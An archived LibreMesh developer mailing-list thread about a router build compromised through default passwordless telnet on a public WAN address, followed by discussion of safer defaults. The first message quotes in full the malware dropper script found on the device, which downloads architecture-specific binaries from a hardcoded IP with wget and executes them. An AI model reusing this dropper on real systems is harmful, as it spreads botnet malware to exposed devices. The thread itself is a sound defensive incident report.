22 Dec
2016
22 Dec
'16
12:19 p.m.
So, i just flashed a generic Community Chaos taken from
http://downloads.libremesh.org/community_chaos/16.07/ar71xx/generic/
on a device that gets a public ipv4 over WAN
went in via telnet, configured some bits, but i felt it was a bit
unresponsive. checking loadavg with "uptime":
12:00:25 up 17 min, load average: 3.70, 1.36, 0.53
and logread showed some OOM... suspicious
i had been infected already with some malware :(
found a process "LA4obRtMROA7TAt2wWN1TnwHw"
and a file in the root directory: /bin.sh
which i copy at the end of this email for reference.
so funny, for a moment i felt a deja-vu like the many times i connected
a Windows PC directly to a public IP, and in under 5 minutes it had been
infected with viruses.
(this LiMe was infected in under 15 minutes as well)
It most likely came in via telnet, since that's open and passwordless
by default on our releases.
I think we should at least block telnet port over WAN by default
##########################
#!/bin/sh
BIN_NAMES="mips mpsl arm arm7 ppc spc m68k sh4"
HTTP_SERVER="95.215.62.11"
HTTP_PORT=80
DROPPER_FILE_NAME="dvrAssist"
for a in $BIN_NAMES
do
if [ -f "/bin/chmod" ]
then
rm $DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
chmod 777 $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
$DROPPER_FILE_NAME
else
rm $DROPPER_FILE_NAME
cp /bin/echo $DROPPER_FILE_NAME
$DROPPER_FILE_NAME
/bin/busybox
wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
$DROPPER_FILE_NAME
fi
done
echo infectfgt
22 Dec
22 Dec
6:23 p.m.
2016-12-22 13:19 GMT+01:00 Gui Iribarren <gui(a)altermundi.net>et>:
i had been infected already with some malware :(
found a process "LA4obRtMROA7TAt2wWN1TnwHw"
and a file in the root directory: /bin.sh
which i copy at the end of this email for reference.
wooooooooooo srsly??
so funny, for a moment i felt a deja-vu like the many
times i connected
a Windows PC directly to a public IP, and in under 5 minutes it had been
infected with viruses.
ROTFL we could call next release LibreMesh 98
It most likely came in via telnet, since that's
open and passwordless
by default on our releases.
I think we should at least block telnet port over WAN by default
+1
But consider that trunk is not using telnet anymore as on LEDE default
is ssh with empty root password.
We should block ssh on WAN port until when root password gets set,
later it will have to be accessible.
Maybe LEDE people already have something for this...?
6 Jan
6 Jan
11:55 p.m.
Unfortunately http://95.215.62.11/bins/mips does not work. Do you have a
copy of the binary file which tries to download?
I'm just curious.
AFAIK the openwrt/lede firewall blocks the WAN ports by default.
However blocking telnet/ssh on the WAN ports is sometimes a headache
because, for any reason on the router/network setup, you only have
access to the WAN port (or what LiMe system believes is the WAN port). I
personally don't like it as a default policy. I would prefer to
distribute the lime binaries with a default password (lime?) and/or
force Chef to ask for a password to the user.
On 22/12/16 19:23, Ilario wrote:
2016-12-22 13:19 GMT+01:00 Gui Iribarren
<gui(a)altermundi.net>et>:
--
./p4u
i had been infected already with some malware :(
found a process "LA4obRtMROA7TAt2wWN1TnwHw"
and a file in the root directory: /bin.sh
which i copy at the end of this email for reference.
wooooooooooo srsly??
so funny, for a moment i felt a deja-vu like the
many times i connected
a Windows PC directly to a public IP, and in under 5 minutes it had been
infected with viruses.
ROTFL we could call next release LibreMesh 98
It most likely came in via telnet, since
that's open and passwordless
by default on our releases.
I think we should at least block telnet port over WAN by default
+1
But consider that trunk is not using telnet anymore as on LEDE default
is ssh with empty root password.
We should block ssh on WAN port until when root password gets set,
later it will have to be accessible.
Maybe LEDE people already have something for this...?
_______________________________________________
lime-dev mailing list
lime-dev(a)lists.libremesh.org
https://lists.libremesh.org/mailman/listinfo/lime-dev
7 Jan
7 Jan
3:19 p.m.
On Saturday 07 January 2017 00:55:36 Pau wrote:
I would prefer to
distribute the lime binaries with a default password (lime?)
I believe this could create a false sense of security that is even worse then
open telnet...
and/or
force Chef to ask for a password to the user.
This seems definitely better!
Cheers!
On 22/12/16 19:23, Ilario wrote:
> 2016-12-22 13:19 GMT+01:00 Gui Iribarren <gui(a)altermundi.net>et>:
>> i had been infected already with some malware :(
>>
>> found a process "LA4obRtMROA7TAt2wWN1TnwHw"
>> and a file in the root directory: /bin.sh
>> which i copy at the end of this email for reference.
>
> wooooooooooo srsly??
>
>> so funny, for a moment i felt a deja-vu like the many times i connected
>> a Windows PC directly to a public IP, and in under 5 minutes it had been
>> infected with viruses.
>
> ROTFL we could call next release LibreMesh 98
>
>> It most likely came in via telnet, since that's open and passwordless
>> by default on our releases.
>>
>> I think we should at least block telnet port over WAN by default
>
> +1
> But consider that trunk is not using telnet anymore as on LEDE default
> is ssh with empty root password.
> We should block ssh on WAN port until when root password gets set,
> later it will have to be accessible.
> Maybe LEDE people already have something for this...?
> _______________________________________________
> lime-dev mailing list
> lime-dev(a)lists.libremesh.org
> https://lists.libremesh.org/mailman/listinfo/lime-dev
2905
days inactive
2921
days old
3 comments
4 participants
participants (4)
-
Gio -
Gui Iribarren -
Ilario -
Pau